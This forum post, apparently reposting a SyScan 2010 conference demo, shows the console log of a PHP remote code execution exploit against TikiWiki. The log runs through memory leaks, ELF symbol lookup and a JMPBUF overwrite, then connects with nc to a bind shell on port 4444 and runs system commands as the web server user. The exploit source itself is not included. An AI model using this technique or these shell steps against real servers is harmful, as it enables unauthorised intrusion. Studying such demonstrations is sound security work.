Jump to content
hozarares

SyScan 2010

Recommended Posts

$ ./exploit.py -h http://t.testsystem/

PHP xxx() Remote Code Execution Exploit (TikiWiki Version)

Copyright © 2010 Stefan Esser/SektionEins GmbH

*** DO NOT DISTRIBUTE ***

[+] Connecting to determine wordsize

[+] Wordsize is 32 bit

[+] Connecting to determine PHP 5.2.x vs. PHP 5.3.x

[+] PHP version is 5.3.x

[+] Connecting to determine XXX version

[+] PHP version >= 5.3.2

[+] Determining endianess of system

[+] System is little endian

[+] Leaking address of std_object_handlers

[+] Found std_object_handlers address to be 0xb76e84a0

[+] Leaking std_object_handlers

[+] Retrieved std_object_handlers (0xb75b5c60, 0xb75b6230, 0xb75b2300, 0xb75b4c70, 0xb75b52f0, 0xb75b3fc0, 0xb75b42b0, 0xb75b4430, 0x00000000, 0x00000000, 0xb75b3c60, 0xb75b4a40, 0xb75b57a0, 0xb75b4170, 0xb75b27d0, 0xb75b4f00, 0x00000000, 0xb75b28a0, 0xb75b27a0, 0xb75b2af0, 0xb75b2830, 0xb75b46b0, 0x00000000, 0x00000000, 0xb75b2be0)

[+] Optimized to 0xb74008f0

[+] Scanning for executable header

[+] ELF header found at 0xb73ab000

[+] Retrieving and parsing ELF header

[+] Retrieving program headers

[+] Retrieving ELF string table

[+] Looking up ELF symbol: executor_globals

[+] Found executor_globals at 0xb76fe280

[+] Looking up ELF symbol: php_execute_script

[+] Found php_execute_script at 0xb75386c0

[+] Looking up ELF symbol: zend_eval_string

[+] Found zend_eval_string at 0xb7586580

[+] Searching JMPBUF in executor_globals

[+] Found JMPBUF at 0xbfcc64b4

[+] Attempt to crack JMPBUF

[+] Determined stored EIP value 0xb753875a from pattern match

[+] Calculated XORER 0x68ab06ea

[+] Unmangled stored ESP is 0xbfcc5470

[+] Checking memory infront of JMPBUF for overwriting possibilities

[+] Found 0x28 at 0xbfcc6498 (0x3e4) using it as overwrite trampoline

[+] Returning into PHP... Spawning a shell at port 4444

...

$ nc t.testsystem 4444

Welcome to the PHPShell 5/22/2010 1:27 am

system("uname -a");

Linux fedora13x86 2.6.33.4-95.fc13.i686.PAE #1 SMP Thu May 13 05:38:26 UTC 2010 i686 i686 i386 GNU/Linux

system("id");

uid=48(apache) gid=484(apache) groups=484(apache) context=unconfined_u:system_r:httpd_t:s0

...

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...